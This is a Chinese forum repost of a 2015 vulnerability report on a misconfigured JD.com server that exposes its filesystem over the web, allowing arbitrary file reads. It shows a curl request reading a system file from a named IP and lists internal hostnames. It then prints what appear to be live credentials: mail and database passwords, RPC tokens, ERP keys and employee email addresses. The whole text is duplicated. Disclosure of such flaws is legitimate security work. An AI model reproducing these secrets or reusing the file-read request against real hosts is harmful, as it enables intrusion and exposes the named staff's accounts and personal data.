-
-
京东某站配置不当导致任意文件读取及延伸
-
发表于: 2015-1-18 22:40 952
-
新闻链接:http://www.2cto.com/Article/201501/370398.html
新闻时间:2015-01-18
新闻正文:大量内部信息泄露,多个内部平台(公关平台)可配置host访问,多个内部邮箱泄露
http://111.206.227.125
目测是做了负载均衡的 其中有一台机器有问题
?
1
2
3
4
5
6
7
─[0] curl http://111.206.227.125/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
IPADDR=172.17.29.86
NETMASK=255.255.255.0
GATEWAY=172.17.29.254
/目录直接映射到了web上
收集信息发现这台机器上的几个业务
tingspider.jd.com
yuqing.jd.com
psm.jd.local
man.psm.jd.local
UMP-Monitor
通过每个站的web.xml为入口 是可以拿到全站源码的
京东的舆情监控系统,从各个媒体上抓取信息(是不是有人说坏话?)
Snip20150110_1.png
tingspider是爬虫系统
以下信息仅作证明
?
1
2
3
4
###send mail ####
#mail.smtp.host=SMTP.jd.com
#mail.user.name=gemini
#mail.user.password=m0c:DJ@tseTbA
?
1
2
3
4
5
6
7
#\u90ae\u4ef6\u914d\u7f6e
mail.host=mail.360buy.com
mail.username=yflijia
mail.password=abcd1981#
mail.from=yflijia@360buy.com
receive.mailReceiver=liaoyaohua@360buy.com;yfzhoudong@360buy.com;cdlixiaowei@360buy.com
receive.errorSendInterval=60
?
1
2
3
4
5
6
7
8
9
10
11
12
## mysql username password
ting.jdbc.username=ting_rw
ting.jdbc.password=@A3#wacJ9StXyamPNKqkn{w2e
## erp key
ting.hrm.ws.content=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
ting.hrm.ws.seed=C602924B0D1090D931E3771D74ABBF9733A8C3545CFE1810
user.soa.rpc.token=6d2c734cc2f286abf21086478c1465e8
club.soa.rpc.token=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
message.ws.content=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
ioms.soa.content=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
ioms.soa.seed=D45A448A7D952F1F88CCE5EBE551FE9AA6FF322A21210B0D
解决方案:
检查配置
新闻时间:2015-01-18
新闻正文:大量内部信息泄露,多个内部平台(公关平台)可配置host访问,多个内部邮箱泄露
http://111.206.227.125
目测是做了负载均衡的 其中有一台机器有问题
?
1
2
3
4
5
6
7
─[0] curl http://111.206.227.125/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
BOOTPROTO=static
ONBOOT=yes
IPADDR=172.17.29.86
NETMASK=255.255.255.0
GATEWAY=172.17.29.254
/目录直接映射到了web上
收集信息发现这台机器上的几个业务
tingspider.jd.com
yuqing.jd.com
psm.jd.local
man.psm.jd.local
UMP-Monitor
通过每个站的web.xml为入口 是可以拿到全站源码的
京东的舆情监控系统,从各个媒体上抓取信息(是不是有人说坏话?)
Snip20150110_1.png
tingspider是爬虫系统
以下信息仅作证明
?
1
2
3
4
###send mail ####
#mail.smtp.host=SMTP.jd.com
#mail.user.name=gemini
#mail.user.password=m0c:DJ@tseTbA
?
1
2
3
4
5
6
7
#\u90ae\u4ef6\u914d\u7f6e
mail.host=mail.360buy.com
mail.username=yflijia
mail.password=abcd1981#
mail.from=yflijia@360buy.com
receive.mailReceiver=liaoyaohua@360buy.com;yfzhoudong@360buy.com;cdlixiaowei@360buy.com
receive.errorSendInterval=60
?
1
2
3
4
5
6
7
8
9
10
11
12
## mysql username password
ting.jdbc.username=ting_rw
ting.jdbc.password=@A3#wacJ9StXyamPNKqkn{w2e
## erp key
ting.hrm.ws.content=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
ting.hrm.ws.seed=C602924B0D1090D931E3771D74ABBF9733A8C3545CFE1810
user.soa.rpc.token=6d2c734cc2f286abf21086478c1465e8
club.soa.rpc.token=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
message.ws.content=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
ioms.soa.content=E40D832CAFF2C90C95685C28630EFEAC3DC8EC05B4A83EE26F5B18252B6CEE09A0CAD88C91A774E1D3197F7C5D91BDBF343FAD801CF08E4B5C651264A01520DD
ioms.soa.seed=D45A448A7D952F1F88CCE5EBE551FE9AA6FF322A21210B0D
解决方案:
检查配置
赞赏
看原图
赞赏
雪币:
留言: